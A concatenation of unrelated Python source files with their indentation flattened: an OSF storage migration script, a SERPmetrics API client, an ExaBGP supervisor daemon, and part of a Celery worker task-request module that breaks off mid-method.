bool Whether or not the given type has a field named 'type'.
"""
params = GenKeyOrderAttrs(soappy_service, ns, type_name)
for param in params:
if param['name'] == 'type': return True
return False
|
|
from __future__ import division
from __future__ import unicode_literals
import math
import logging
import progressbar
from pymongo.errors import DuplicateKeyError
from modularodm import Q
from modularodm.storage.base import KeyExistsException
from framework.mongo import database
from framework.analytics import clean_page
from framework.transactions.context import TokuTransaction
from scripts import utils as scripts_utils
from website.app import init_app
from website.project.model import NodeLog
from website.addons.osfstorage import model
logger = logging.getLogger(__name__)
LOG_ACTIONS = set([
'osf_storage_file_added',
'osf_storage_file_updated',
'osf_storage_file_removed',
'osf_storage_file_restored',
'file_added',
'file_updated',
'file_removed',
'file_restored',
])
def migrate_download_counts(node, children, dry=True):
collection = database['pagecounters']
updates = []
for old_path, new in children.items():
if dry:
# Note in dry mode new is None
new_id = ':'.join(['download', node._id, 'new_id'])
old_id = ':'.join(['download', node._id, old_path])
else:
new_id = ':'.join(['download', node._id, new._id])
old_id = ':'.join(['download', node._id, old_path])
result = collection.find_one({'_id': clean_page(old_id)})
if not result:
continue
logger.info('Copying download counts of {!r} to {!r}'.format(old_path, new))
if not dry:
result['_id'] = new_id
updates.append(result)
# try:
# # database.pagecounters.insert(result)
# except DuplicateKeyError:
# logger.warn('Already migrated {!r}'.format(old_path))
# continue
else:
continue
for idx in range(len(new.versions)):
result = collection.find_one({'_id': clean_page('{}:{}'.format(old_id, idx + 1))})
if not result:
continue
logger.info('Copying download count of version {} of {!r} to version {} of {!r}'.format(idx + 1, old_path, idx, new))
if not dry:
result['_id'] = '{}:{}'.format(new_id, idx)
updates.append(result)
# database.pagecounters.insert(result)
if not dry:
try:
database.pagecounters.insert(updates, continue_on_error=True)
except DuplicateKeyError:
pass
def migrate_node_settings(node_settings, dry=True):
logger.info('Running `on add` for node settings of {}'.format(node_settings.owner._id))
if not dry:
node_settings.on_add()
def migrate_file(node, old, parent, dry=True):
assert isinstance(old, model.OsfStorageFileRecord)
if not dry:
try:
new = parent.append_file(old.name)
logger.debug('Created new child {}'.format(old.name))
except KeyExistsException:
logger.warning('{!r} has already been migrated'.format(old))
return parent.find_child_by_name(old.name)
new.versions = old.versions
new.is_deleted = old.is_deleted
new.save()
else:
new = None
return new
def migrate_logs(node, children, dry=True):
for log in NodeLog.find(Q('params.node', 'eq', node._id)):
if log.action not in LOG_ACTIONS:
continue
if log.params.get('_path') is not None and log.params.get('_urls'):
logger.warning('Log for file {} has already been migrated'.format(log.params['path']))
continue
if dry:
logger.debug('{!r} {} -> {}'.format(log, log.params['path'], 'New path'))
continue
try:
new = children[log.params['path']]
except KeyError:
if not log.params['path'].startswith('/'):
logger.warning('Failed to migrate log with path {}'.format(log.params['path']))
continue
mpath = new.materialized_path()
url = '/{}/files/osfstorage/{}/'.format(node._id, new._id)
logger.debug('{!r} {} -> {}'.format(log, log.params['path'], mpath))
log.params['_path'] = mpath
log.params['_urls'] = {
'view': url,
'download': url + '?action=download'
}
log.save()
NodeLog._cache.clear()
def migrate_guids(node, children, dry=True):
for guid in model.OsfStorageGuidFile.find(Q('node', 'eq', node)):
if guid._path is not None:
logger.warn('File guid {} has already been migrated'.format(guid._id))
continue
logger.info('Migrating file guid {}'.format(guid._id))
if not dry:
try:
guid._path = children[guid.path].path
except KeyError:
if not guid.path.startswith('/'):
raise
logger.warning('Already migrated {!r}'.format(guid))
continue
guid.save()
model.OsfStorageGuidFile._cache.clear()
def migrate_children(node_settings, dry=True):
if not node_settings.file_tree:
return logger.warning('Skipping node {}; file_tree is None'.format(node_settings.owner._id))
logger.info('Migrating children of node {}'.format(node_settings.owner._id))
children = {}
for x in node_settings.file_tree.children:
n = migrate_file(node_settings.owner, x, node_settings.root_node, dry=dry)
if n: # not migrated yet
children[x.path] = n
migrate_logs(node_settings.owner, children, dry=dry)
migrate_guids(node_settings.owner, children, dry=dry)
migrate_download_counts(node_settings.owner, children, dry=dry)
del children
def main(nworkers, worker_id, dry=True, catchup=True):
if not dry:
scripts_utils.add_file_logger(logger, __file__)
logger.info('Not running in dry mode, changes WILL be made')
else:
logger.info('Running in dry mode, changes NOT will be made')
if catchup:
logger.info('Running in catchup mode, looping over ALL OsfStorageNodeSettings objects')
to_migrate = model.OsfStorageNodeSettings.find()
else:
to_migrate = model.OsfStorageNodeSettings.find(Q('root_node', 'eq', None))
if to_migrate.count() == 0:
logger.info('No nodes to migrate; exiting...')
return
count = 0
failed = 0
logger.info('Found {} nodes to migrate'.format(to_migrate.count()))
progress_bar = progressbar.ProgressBar(maxval=math.ceil(to_migrate.count() / nworkers)).start()
for node_settings in to_migrate:
if hash(node_settings._id) % nworkers != worker_id:
continue
try:
with TokuTransaction():
migrate_node_settings(node_settings, dry=dry)
migrate_children(node_settings, dry=dry)
count += 1
progress_bar.update(count)
except Exception as error:
logger.error('Could not migrate file tree from {}'.format(node_settings.owner._id))
logger.exception(error)
failed += 1
progress_bar.finish()
if failed > 0:
logger.error('Failed to migrate {} nodes'.format(failed))
# Migrate file guids
# db.osfstorageguidfile.update({
# '_path': {'$ne': null}
# }, {
# $rename:{'path': 'premigration_path'}
# }, {multi: true})
# db.osfstorageguidfile.update({
# '_path': {'$ne': null}
# }, {
# $rename:{'_path': 'path'}
# }, {multi: true})
# Migrate logs
# db.nodelog.update({
# 'params._path': {'$ne': null}
# }, {
# $rename:{'params.path': 'params.premigration_path'}
# }, {multi: true})
# db.nodelog.update({
# 'params._path': {'$ne': null}
# }, {
# $rename:{'params._path': 'params.path'}
# }, {multi: true})
# db.nodelog.update({
# 'params._urls': {'$ne': null}
# }, {
# $rename:{'params.urls': 'params.premigration_urls'}
# }, {multi: true})
# db.nodelog.update({
# 'params._urls': {'$ne': null}
# }, {
# $rename:{'params._urls': 'params.urls'}
# }, {multi: true})
if __name__ == '__main__':
import sys
nworkers = int(sys.argv[1])
worker_id = int(sys.argv[2])
dry = 'dry' in sys.argv
catchup = 'catchup' in sys.argv
if 'debug' in sys.argv:
logger.setLevel(logging.DEBUG)
elif 'info' in sys.argv:
logger.setLevel(logging.INFO)
elif 'error' in sys.argv:
logger.setLevel(logging.ERROR)
init_app(set_backends=True, routes=False)
main(nworkers, worker_id, dry=dry, catchup=catchup)
|
|
import time, datetime
import hmac, hashlib
import urllib, urllib2, socket
import json
"""SERPmetrics Python-SDK"""
class SMapi(object):
VERSION = 'v0.0.2'
api_url = 'http://api.serpmetrics.com'
user_agent = 'SERPmetrics Python Library'
retries = 3
_http_status = None
_credentials = {'key':None, 'secret':None}
"""
Sets up a new SM instance
@param dict credentials
@return void
"""
def __init__(self, credentials={}):
super(SMapi, self).__init__()
self._credentials = credentials
"""
Adds a new keyword to the queue. engines should be passed as a list
of {engine}_{locale} strings.
Also takes a list of keyword strings
Ex. ["google_en-us", "yahoo_en-us", "bing_en-us"]
@param string or list keyword
@param list engines
@param string location
@param string device
@return mixed
"""
def add(self, keyword, engines, location=None, device="desktop"):
if not isinstance(engines, list) and len(engines):
engines = [engines]
options = {'path':'/keywords/add', 'params':{'keyword':keyword, 'engines':engines, 'location':location, 'device':device}}
return self.rest(options)
"""
Removes a keyword from the queue.
Note: this REMOVES a keyword entirely, including ALL engines assigned. To update
a keywords engine list, simply call add() with the new engine list
Also takes a list of keyword_id strings.
@param string or list keyword_id
@return mixed
"""
def remove(self, keyword_id):
options = {'path':'/keywords/delete', 'params':{'keyword_id':keyword_id}}
return self.rest(options)
"""
Adds a new keyword to the priority queue, usage as per add()
"""
def priority_add(self, keyword, engines, location=None, device="desktop"):
if not isinstance(engines, list) and len(engines):
engines = [engines]
options = {'path':'/priority/add', 'params':{'keyword':keyword, 'engines':engines, 'location':location, 'device':device}}
return self.rest(options)
"""
Gets status for a given priority_id
@param string priority_id
@return mixed
"""
def priority_status(self, priority_id):
options = {'path':'/priority/status', 'params':{'priority_id':priority_id}}
return self.rest(options)
"""
Adds a new keyword to the delayed queue, usage as per add()
"""
def delayed_add(self, keyword, engines, location=None, device="desktop"):
if not isinstance(engines, list) and len(engines):
engines = [engines]
options = {'path':'/delayed/add', 'params':{'keyword':keyword, 'engines':engines, 'location':location, 'device':device}}
return self.rest(options)
"""
Gets status for a given delayed_id
@param string delayed_id
@return mixed
"""
def delayed_status(self, delayed_id):
options = {'path':'/delayed/status', 'params':{'delayed_id':delayed_id}}
return self.rest(options)
"""
Gets last limit SERP check timestamps/ids for keyword/engine combination. engine
should be in the format {engine}_{locale} (for example google_en-us).
@param string keyword_id
@param string engine
@param integer limit (optional)
@return dict
"""
def check(self, keyword_id, engine, limit=10):
options = {'path':'/keywords/check', 'params':{'keyword_id':keyword_id, 'engine':engine, 'limit':limit}, 'method':'GET'}
return self.rest(options)
"""
Get SERP data for given id. Restricted to optional specified domain
@param string id
@param string domain
@return mixed
"""
def serp(self, check_id, domain=None):
options = {'path':'/keywords/serp', 'params':{'check_id':check_id, 'domain':domain}}
return self.rest(options)
"""
Get current credit balance
@return mixed
"""
def credit(self):
options = {'path':'/users/credit'}
return self.rest(options)
"""
Get trended flux data for a given engine_code
@param string engine_code
@param string type
@return mixed
"""
def flux(self, engine_code, _type='daily'):
options = {'path':'/flux/trend', 'params':{'engine_code':engine_code, 'type':_type}}
return self.rest(options)
"""
Generates authentication signature
@param dict credentials
@return dict
"""
def _generate_signature(self, credentials=None):
now = datetime.datetime.now()
ts = str(time.mktime(now.timetuple())).split('.')[0]
if not credentials or not len(credentials):
credentials = self.credentials
h = hmac.new(credentials['secret'], ts, hashlib.sha256).digest()
signature = h.encode("base64")
#signature = ts+signature
return {'ts':int(ts), 'signature':signature}
"""
Generates a REST request to the API with retries and exponential backoff
@param dict options
@param dict credentials
@return mixed
"""
def rest(self, options, credentials={}):
defaults = {'method':'POST',
'url':self.api_url,
'path':'/', }
# Concatenate options with defaults
for key in defaults.keys():
if not key in options.keys():
options[key] = defaults[key]
if 'params' in options.keys() and options['params']:
params = json.dumps(options['params'])
else:
params = {}
if not credentials:
credentials = self._credentials
auth = self._generate_signature(credentials)
auth['signature'] = auth['signature'].strip('\n')
_params = params if params else None
options['query'] = {'key':credentials['key'],
'auth':auth['signature'],
'ts':auth['ts'],
'params': _params }
url = options['url'] + options['path']
req_vals = {'params':options['query']['params'],
'key':options['query']['key'],
'auth':options['query']['auth'],
'ts':options['query']['ts'] }
req_data = urllib.urlencode(req_vals)
if options['method'] == 'GET':
url = url + '?' + req_data
req = urllib2.Request(url)
else:
req = urllib2.Request(url, req_data)
req.add_header('User-Agent', self.user_agent+' '+self.VERSION)
attempt = 0
while True:
attempt += 1
try:
res = urllib2.urlopen(req)
self._http_status = res.getcode()
res_data = res.read()
json_data = json.loads(res_data)
return json.loads(json.dumps(json_data))
except urllib2.URLError, e:
if hasattr(e, "reason") and isinstance(e.reason, socket.timeout):
if not self._exponential_backoff(attempt, self.retries):
return False
else:
self._http_status = e.code
break
finally:
pass
"""
Return the last HTTP status code received. Useful for debugging purposes.
@return integer
"""
def http_status(self):
return self._http_status
"""
Implements exponential backoff
@param integer current
@param integer max
@return bool
"""
def _exponential_backoff(self, current, _max):
if current <= _max:
delay = int((2 ** current) * 100000)
time.sleep(delay)
return True
return False
|
|
# encoding: utf-8
"""
exabgp.py
Created by Thomas Mangin on 2009-08-30.
Copyright (c) 2009 Exa Networks. All rights reserved.
"""
import os
import sys
import time
import signal
import select
from bagpipe.exabgp.network.peer import Peer
from bagpipe.exabgp.version import version
from bagpipe.exabgp.daemon import Daemon
from bagpipe.exabgp.processes import Processes
from bagpipe.exabgp.configuration import Configuration
from bagpipe.exabgp.network.connection import errno_block
from bagpipe.exabgp.processes import ProcessError
from bagpipe.exabgp.log import Logger
logger = Logger()
class Supervisor (object):
# [hex(ord(c)) for c in os.popen('clear').read()]
clear = ''.join([chr(int(c,16)) for c in ['0x1b', '0x5b', '0x48', '0x1b', '0x5b', '0x32', '0x4a']])
def __init__ (self,configuration):
self.daemon = Daemon(self)
self.processes = Processes(self)
self.configuration = Configuration(configuration)
self.watchdogs = {}
self._peers = {}
self._shutdown = False
self._reload = False
self._restart = False
self._route_update = False
self._commands = {}
self._saved_pid = False
self.reload()
signal.signal(signal.SIGTERM, self.sigterm)
signal.signal(signal.SIGHUP, self.sighup)
signal.signal(signal.SIGALRM, self.sigalrm)
def sigterm (self,signum, frame):
logger.supervisor("SIG TERM received")
self._shutdown = True
def sighup (self,signum, frame):
logger.supervisor("SIG HUP received")
self._reload = True
def sigalrm (self,signum, frame):
logger.supervisor("SIG ALRM received")
self._restart = True
def run (self,supervisor_speed=0.5):
if self.daemon.drop_privileges():
logger.supervisor("Could not drop privileges to '%s' refusing to run as root" % self.daemon.user)
logger.supervisor("Set the environmemnt value USER to change the unprivileged user")
return
self.daemon.daemonise()
self.daemon.savepid()
# did we complete the run of updates caused by the last SIGHUP ?
reload_completed = True
while True:
try:
while self._peers:
start = time.time()
self.handle_commands(self.processes.received())
if self._shutdown:
self._shutdown = False
self.shutdown()
elif self._reload and reload_completed:
self._reload = False
self.reload()
elif self._restart:
self._restart = False
self.restart()
elif self._route_update:
self._route_update = False
self.route_update()
elif self._commands:
self.commands(self._commands)
self._commands = {}
reload_completed = True
# Handle all connection
peers = self._peers.keys()
ios = []
while peers:
for key in peers[:]:
peer = self._peers[key]
# there was no routes to send for this peer, we performed keepalive checks
if peer.run() is not True:
# no need to come back to it before a a full cycle
if peer.bgp and peer.bgp.connection:
ios.append(peer.bgp.connection.io)
peers.remove(key)
# send the route we parsed (if we parsed any to our child processes)
# This is a generator and can only be run once
try:
for route in peer.received_routes():
# This is a generator which content does only change at config reload
for name in self.processes.receive_routes():
# using str(key) as we should not manipulate it and assume its format
self.processes.write(name,'neighbor %s %s\n' % (str(key),route))
except ProcessError:
# Can not find any better error code that 6,0 !
raise Notify(6,0,'ExaBGP Internal error, sorry.')
# otherwise process as many routes as we can within a second for the remaining peers
duration = time.time() - start
# RFC state that we MUST not more than one KEEPALIVE / sec
# And doing less could cause the session to drop
if duration >= 1.0:
reload_completed = False
ios=[]
break
duration = time.time() - start
if ios:
try:
read,_,_ = select.select(ios,[],[],max(supervisor_speed-duration,0))
except select.error,e:
errno,message = e.args
if not errno in errno_block:
raise
else:
if duration < supervisor_speed:
time.sleep(max(supervisor_speed-duration,0))
self.processes.terminate()
self.daemon.removepid()
break
except KeyboardInterrupt:
logger.supervisor("^C received")
self._shutdown = True
except IOError:
logger.supervisor("I/O Error received, most likely ^C during IO")
self._shutdown = True
except ProcessError:
logger.supervisor("Problem when sending message(s) to helper program, stopping")
self._shutdown = True
# from leak import objgraph
# print objgraph.show_most_common_types(limit=20)
# import random
# obj = objgraph.by_type('ReceivedRoute')[random.randint(0,2000)]
# objgraph.show_backrefs([obj], max_depth=10)
def shutdown (self):
"""terminate all the current BGP connections"""
logger.info("Performing shutdown","supervisor")
for key in self._peers.keys():
self._peers[key].stop()
def reload (self):
"""reload the configuration and send to the peer the route which changed"""
logger.info("Performing reload of exabgp %s" % version,"configuration")
reloaded = self.configuration.reload()
if not reloaded:
logger.info("Problem with the configuration file, no change done","configuration")
logger.info(self.configuration.error,"configuration")
return
for key in self._peers.keys():
if key not in self.configuration.neighbor.keys():
neighbor = self.configuration.neighbor[key]
logger.supervisor("Removing Peer %s" % neighbor.name())
self._peers[key].stop()
for key in self.configuration.neighbor.keys():
neighbor = self.configuration.neighbor[key]
# new peer
if key not in self._peers.keys():
logger.supervisor("New Peer %s" % neighbor.name())
peer = Peer(neighbor,self)
self._peers[key] = peer
else:
# check if the neighbor definition are the same (BUT NOT THE ROUTES)
if self._peers[key].neighbor != neighbor:
logger.supervisor("Peer definition change, restarting %s" % str(key))
self._peers[key].restart(neighbor)
# set the new neighbor with the new routes
else:
logger.supervisor("Updating routes for peer %s" % str(key))
self._peers[key].reload(neighbor.every_routes())
logger.info("Loaded new configuration successfully",'configuration')
self.processes.start()
def handle_commands (self,commands):
for service in commands:
for command in commands[service]:
# watchdog
if command.startswith('announce watchdog') or command.startswith('withdraw watchdog'):
parts = command.split(' ')
try:
name = parts[2]
except IndexError:
name = service
self.watchdogs[name] = parts[0]
self._route_update = True
# route announcement / withdrawal
elif command.startswith('announce route'):
route = self.configuration.parse_single_route(command)
if not route:
logger.supervisor("Command could not parse route in : %s" % command)
else:
self.configuration.add_route_all_peers(route)
self._route_update = True
elif command.startswith('withdraw route'):
route = self.configuration.parse_single_route(command)
if not route:
logger.supervisor("Command could not parse route in : %s" % command)
else:
if self.configuration.remove_route_all_peers(route):
logger.supervisor("Command success, route found and removed : %s" % route)
self._route_update = True
else:
logger.supervisor("Command failure, route not found : %s" % route)
# flow announcement / withdrawal
elif command.startswith('announce flow'):
flow = self.configuration.parse_single_flow(command)
if not flow:
logger.supervisor("Command could not parse flow in : %s" % command)
else:
self.configuration.add_route_all_peers(flow)
self._route_update = True
elif command.startswith('withdraw flow'):
flow = self.configuration.parse_single_flow(command)
if not flow:
logger.supervisor("Command could not parse flow in : %s" % command)
else:
if self.configuration.remove_route_all_peers(flow):
logger.supervisor("Command success, flow found and removed : %s" % flow)
self._route_update = True
else:
logger.supervisor("Command failure, flow not found : %s" % flow)
# commands
elif command in ['reload','restart','shutdown','version']:
self._commands.setdefault(service,[]).append(command)
# unknown
else:
logger.supervisor("Command from process not understood : %s" % command)
def commands (self,commands):
def _answer (service,string):
self.processes.write(service,string)
logger.supervisor('Responding to %s : %s' % (service,string))
for service in commands:
for command in commands[service]:
if command == 'shutdown':
self._shutdown = True
_answer(service,'shutdown in progress')
continue
if command == 'reload':
self._reload = True
_answer(service,'reload in progress')
continue
if command == 'restart':
self._restart = True
_answer(service,'restart in progress')
continue
if command == 'version':
_answer(service,'exabgp %s' % version)
continue
def route_update (self):
"""the process ran and we need to figure what routes to changes"""
logger.supervisor("Performing dynamic route update")
for key in self.configuration.neighbor.keys():
neighbor = self.configuration.neighbor[key]
neighbor.watchdog(self.watchdogs)
self._peers[key].reload(neighbor.every_routes())
logger.supervisor("Updated peers dynamic routes successfully")
def restart (self):
"""kill the BGP session and restart it"""
logger.info("Performing restart of exabgp %s" % version,"supervisor")
self.configuration.reload()
for key in self._peers.keys():
if key not in self.configuration.neighbor.keys():
neighbor = self.configuration.neighbor[key]
logger.supervisor("Removing Peer %s" % neighbor.name())
self._peers[key].stop()
else:
self._peers[key].restart()
self.processes.start()
def unschedule (self,peer):
key = peer.neighbor.name()
if key in self._peers:
del self._peers[key]
def version_warning ():
sys.stdout.write('\n')
sys.stdout.write('************ WARNING *** WARNING *** WARNING *** WARNING *********\n')
sys.stdout.write('* This program SHOULD work with your python version (2.4). *\n')
sys.stdout.write('* No tests have been performed. Consider python 2.4 unsupported *\n')
sys.stdout.write('* Please consider upgrading to the latest 2.x stable realease. *\n')
sys.stdout.write('************ WARNING *** WARNING *** WARNING *** WARNING *********\n')
sys.stdout.write('\n')
def help ():
sys.stdout.write('\n')
sys.stdout.write('*******************************************************************************\n')
sys.stdout.write('set the following environment values to gather information and report bugs\n')
sys.stdout.write('\n')
sys.stdout.write('DEBUG_ALL : debug everything\n')
sys.stdout.write('DEBUG_CONFIGURATION : verbose configuration parsing\n')
sys.stdout.write('DEBUG_SUPERVISOR : signal received, configuration reload (default: yes))\n')
sys.stdout.write('DEBUG_DAEMON : pid change, forking, ... (default: yes))\n')
sys.stdout.write('DEBUG_PROCESSES : handling of forked processes (default: yes))\n')
sys.stdout.write('DEBUG_WIRE : the packet sent and received\n')
sys.stdout.write('DEBUG_RIB : change in route announcement in config reload\n')
sys.stdout.write('DEBUG_MESSAGE : changes in route announcement in config reload (default: yes)\n')
sys.stdout.write('DEBUG_TIMERS : tracking keepalives\n')
sys.stdout.write('DEBUG_ROUTES : print parsed routes\n')
sys.stdout.write('\n')
sys.stdout.write('PROFILE : (1,true,on,yes,enable) profiling info on exist\n')
sys.stdout.write(' use a filename to dump the outpout in a file\n')
sys.stdout.write(' IMPORTANT : exabpg will not overwrite existing files\n')
sys.stdout.write('\n')
sys.stdout.write('PDB : on program fault, start pdb the python interactive debugger\n')
sys.stdout.write('\n')
sys.stdout.write('USER : the user the program should try to use if run by root (default: nobody)\n')
sys.stdout.write('PID : the file in which the pid of the program should be stored\n')
sys.stdout.write('SYSLOG: no value for local syslog, a file name (which will auto-rotate) or host:<host> for remote syslog\n')
sys.stdout.write('DAEMONIZE: detach and send the program in the background\n')
sys.stdout.write('MINIMAL_MP: when negociating multiprotocol, try to announce as few AFI/SAFI pair as possible\n')
sys.stdout.write('\n')
sys.stdout.write('For example :\n')
sys.stdout.write('> env PDB=1 PROFILE=~/profile.log DEBUG_SUPERVISOR=0 DEBUG_WIRE=1 \\\n')
sys.stdout.write(' USER=wheel SYSLOG=host:127.0.0.1 DAEMONIZE= PID=/var/run/exabpg.pid \\\n')
sys.stdout.write(' ./bin/exabgp ./etc/bgp/configuration.txt\n')
sys.stdout.write('*******************************************************************************\n')
sys.stdout.write('\n')
sys.stdout.write('usage:\n exabgp <configuration file>\n')
def main ():
main = int(sys.version[0])
secondary = int(sys.version[2])
if main != 2 or secondary < 4:
sys.exit('This program can not work (is not tested) with your python version (< 2.4 or >= 3.0)')
if main == 2 and secondary == 4:
version_warning()
if len(sys.argv) < 2:
help()
sys.exit(0)
for arg in sys.argv[1:]:
if arg in ['--',]:
break
if arg in ['-h','--help']:
help()
sys.exit(0)
Supervisor(sys.argv[1]).run()
sys.exit(0)
if __name__ == '__main__':
profiled = os.environ.get('PROFILE',0)
if profiled == 0:
main()
else:
try:
import cProfile as profile
except:
import profile
if profiled.lower() in ['1','true','yes','on','enable']:
profile.run('main()')
else:
notice = ''
if os.path.isdir(profiled):
notice = 'profile can not use this filename as outpout, it is not a directory (%s)' % profiled
if os.path.exists(profiled):
notice = 'profile can not use this filename as outpout, it already exists (%s)' % profiled
if not notice:
logger.supervisor('profiling ....')
profile.run('main()',filename=profiled)
else:
logger.supervisor("-"*len(notice))
logger.supervisor(notice)
logger.supervisor("-"*len(notice))
main()
|
|
import sys
import time
import socket
import warnings
from celery import conf
from celery import log
from celery import platform
from celery.datastructures import ExceptionInfo
from celery.execute.trace import TaskTrace
from celery.loaders import current_loader
from celery.registry import tasks
from celery.utils import noop, kwdict, fun_takes_kwargs
from celery.utils.mail import mail_admins
from celery.worker import state
# pep8.py borks on a inline signature separator and
# says "trailing whitespace" ;)
EMAIL_SIGNATURE_SEP = "-- "
TASK_ERROR_EMAIL_BODY = """
Task %%(name)s with id %%(id)s raised exception: %%(exc)s
Task was called with args: %%(args)s kwargs: %%(kwargs)s.
The contents of the full traceback was:
%%(traceback)s
%(EMAIL_SIGNATURE_SEP)s
Just to let you know,
celeryd at %%(hostname)s.
""" % {"EMAIL_SIGNATURE_SEP": EMAIL_SIGNATURE_SEP}
WANTED_DELIVERY_INFO = ("exchange", "routing_key", "consumer_tag", )
class InvalidTaskError(Exception):
"""The task has invalid data or is not properly constructed."""
class AlreadyExecutedError(Exception):
"""Tasks can only be executed once, as they might change
world-wide state."""
class WorkerTaskTrace(TaskTrace):
"""Wraps the task in a jail, catches all exceptions, and
saves the status and result of the task execution to the task
meta backend.
If the call was successful, it saves the result to the task result
backend, and sets the task status to ``"SUCCESS"``.
If the call raises :exc:`celery.exceptions.RetryTaskError`, it extracts
the original exception, uses that as the result and sets the task status
to ``"RETRY"``.
If the call results in an exception, it saves the exception as the task
result, and sets the task status to ``"FAILURE"``.
:param task_name: The name of the task to execute.
:param task_id: The unique id of the task.
:param args: List of positional args to pass on to the function.
:param kwargs: Keyword arguments mapping to pass on to the function.
:returns: the function return value on success, or
the exception instance on failure.
"""
def __init__(self, *args, **kwargs):
self.loader = kwargs.pop("loader", current_loader())
super(WorkerTaskTrace, self).__init__(*args, **kwargs)
self._store_errors = True
if self.task.ignore_result:
self._store_errors = conf.STORE_ERRORS_EVEN_IF_IGNORED
self.super = super(WorkerTaskTrace, self)
def execute_safe(self, *args, **kwargs):
"""Same as :meth:`execute`, but catches errors."""
try:
return self.execute(*args, **kwargs)
except Exception, exc:
_type, _value, _tb = sys.exc_info()
_value = self.task.backend.prepare_exception(exc)
exc_info = ExceptionInfo((_type, _value, _tb))
warnings.warn("Exception outside body: %s: %s\n%s" % tuple(
map(str, (exc.__class__, exc, exc_info.traceback))))
return exc_info
def execute(self):
"""Execute, trace and store the result of the task."""
self.loader.on_task_init(self.task_id, self.task)
if self.task.track_started:
self.task.backend.mark_as_started(self.task_id)
try:
return super(WorkerTaskTrace, self).execute()
finally:
self.task.backend.process_cleanup()
self.loader.on_process_cleanup()
def handle_success(self, retval, *args):
"""Handle successful execution."""
if not self.task.ignore_result:
self.task.backend.mark_as_done(self.task_id, retval)
return self.super.handle_success(retval, *args)
def handle_retry(self, exc, type_, tb, strtb):
"""Handle retry exception."""
message, orig_exc = exc.args
if self._store_errors:
self.task.backend.mark_as_retry(self.task_id, orig_exc, strtb)
self.super.handle_retry(exc, type_, tb, strtb)
def handle_failure(self, exc, type_, tb, strtb):
"""Handle exception."""
if self._store_errors:
exc = self.task.backend.mark_as_failure(self.task_id, exc, strtb)
else:
exc = self.task.backend.prepare_exception(exc)
return self.super.handle_failure(exc, type_, tb, strtb)
def execute_and_trace(task_name, *args, **kwargs):
"""This is a pickleable method used as a target when applying to pools.
It's the same as::
>>> WorkerTaskTrace(task_name, *args, **kwargs).execute_safe()
"""
platform.set_mp_process_title("celeryd", info=task_name)
try:
return WorkerTaskTrace(task_name, *args, **kwargs).execute_safe()
finally:
platform.set_mp_process_title("celeryd")
class TaskRequest(object):
"""A request for task execution.
:param task_name: see :attr:`task_name`.
:param task_id: see :attr:`task_id`.
:param args: see :attr:`args`
:param kwargs: see :attr:`kwargs`.
.. attribute:: task_name
Kind of task. Must be a name registered in the task registry.
.. attribute:: task_id
UUID of the task.
.. attribute:: args
List of positional arguments to apply to the task.
.. attribute:: kwargs
Mapping of keyword arguments to apply to the task.
.. attribute:: on_ack
Callback called when the task should be acknowledged.
.. attribute:: message
The original message sent. Used for acknowledging the message.
.. attribute:: executed
Set to ``True`` if the task has been executed.
A task should only be executed once.
.. attribute:: delivery_info
Additional delivery info, e.g. the contains the path
from producer to consumer.
.. attribute:: acknowledged
Set to ``True`` if the task has been acknowledged.
"""
# Logging output
success_msg = "Task %(name)s[%(id)s] processed: %(return_value)s"
error_msg = """
Task %(name)s[%(id)s] raised exception: %(exc)s\n%(traceback)s
"""
# E-mails
email_subject = """
[celery@%(hostname)s] Error: Task %(name)s (%(id)s): %(exc)s
"""
email_body = TASK_ERROR_EMAIL_BODY
# Internal flags
executed = False
acknowledged = False
time_start = None
_already_revoked = False
def __init__(self, task_name, task_id, args, kwargs,
on_ack=noop, retries=0, delivery_info=None, hostname=None,
email_subject=None, email_body=None, logger=None,
eventer=None, **opts):
self.task_name = task_name
self.task_id = task_id
self.retries = retries
self.args = args
self.kwargs = kwargs
self.on_ack = on_ack
self.delivery_info = delivery_info or {}
self.hostname = hostname or socket.gethostname()
self.logger = logger or log.get_default_logger()
self.eventer = eventer
self.email_subject = email_subject or self.email_subject
self.email_body = email_body or self.email_body
self.task = tasks[self.task_name]
def __repr__(self):
return '<%s: {name:"%s", id:"%s", args:"%s", kwargs:"%s"}>' % (
self.__class__.__name__,
self.task_name, self.task_id,
self.args, self.kwargs)
def revoked(self):
if self._already_revoked:
return True
if self.task_id in state.revoked:
self.logger.warn("Skipping revoked task: %s[%s]" % (
self.task_name, self.task_id))
self.send_event("task-revoked", uuid=self.task_id)
self.acknowledge()
self._already_revoked = True
return True
return False
@classmethod
def from_message(cls, message, message_data, logger=None, eventer=None,
hostname=None):
"""Create a :class:`TaskRequest` from a task message sent by
:class:`celery.messaging.TaskPublisher`.
:raises UnknownTaskError: if the message does not describe a task,
the message is also rejected.
:returns: :class:`TaskRequest` instance.
"""
task_name = message_data["task"]
task_id = message_data["id"]
args = message_data["args"]
kwargs = message_data["kwargs"]
retries = message_data.get("retries", 0)
_delivery_info = getattr(message, "delivery_info", {})
delivery_info = dict((key, _delivery_info.get(key))
for key in WANTED_DELIVERY_INFO)
if not hasattr(kwargs, "items"):
raise InvalidTaskError("Task kwargs must be a dictionary.")
return cls(task_name, task_id, args, kwdict(kwargs),
retries=retries, on_ack=message.ack,
delivery_info=delivery_info, logger=logger,
eventer=eventer, hostname=hostname)
def extend_with_default_kwargs(self, loglevel, logfile):
"""Extend the tasks keyword arguments with standard task arguments.
Currently these are ``logfile``, ``loglevel``, ``task_id``,
``task_name``, ``task_retries``, and ``delivery_info``.
See :meth:`celery.task.base.Task.run` for more information.
"""
kwargs = dict(self.kwargs)
default_kwargs = {"logfile": logfile,
"loglevel": loglevel,
"task_id": self.task_id,
"task_name": self.task_name,
"task_retries": self.retries,
"task_is_eager": False,
"delivery_info": self.delivery_info}
fun = self.task.run
supported_keys = fun_takes_kwargs(fun, default_kwargs)
extend_with = dict((key, val) for key, val in default_kwargs.items()
if key in supported_keys)
kwargs.update(extend_with)
return kwargs
def _get_tracer_args(self, loglevel=None, logfile=None):
"""Get the :class:`WorkerTaskTrace` tracer for this task."""
task_func_kwargs = self.extend_with_default_kwargs(loglevel, logfile)
return self.task_name, self.task_id, self.args, task_func_kwargs
def _set_executed_bit(self):
"""Set task as executed to make sure it's not executed again."""
if self.executed:
raise AlreadyExecutedError(
"Task %s[%s] has already been executed" % (
self.task_name, self.task_id))
self.executed = True
def execute(self, loglevel=None, logfile=None):
"""Execute the task in a :class:`WorkerTaskTrace`.
:keyword loglevel: The loglevel used by the task.
:keyword logfile: The logfile used by the task.
"""
if self.revoked():
return
# Make sure task has not already been executed.
self._set_executed_bit()
# acknowledge task as being processed.
if not self.task.acks_late:
self.acknowledge()
tracer = WorkerTaskTrace(*self._get_tracer_args(loglevel, logfile))
